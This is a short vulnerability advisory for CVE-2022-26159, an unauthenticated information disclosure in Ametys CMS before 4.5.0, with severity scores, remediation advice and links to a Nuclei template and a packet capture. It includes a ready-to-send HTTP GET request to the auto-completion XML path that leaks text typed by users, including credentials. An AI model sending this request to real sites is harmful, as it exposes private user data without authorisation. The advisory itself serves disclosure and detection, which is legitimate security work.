| Title | Ametys CMS Information Disclosure |
|---|---|
| Author | Remi Gascou (podalirius) |
| Severity | Medium |
| Impact | The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. |
| CVSS Score | 5.3 |
| EPSS Score | 0.88594 |
| CVE ID | CVE-2022-26159 |
| CWE ID | CWE-425 |
| Tags | cve cve2022 plugin ametys cms vuln |
Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.
GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-26159.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-26159.pcap
N/AN/A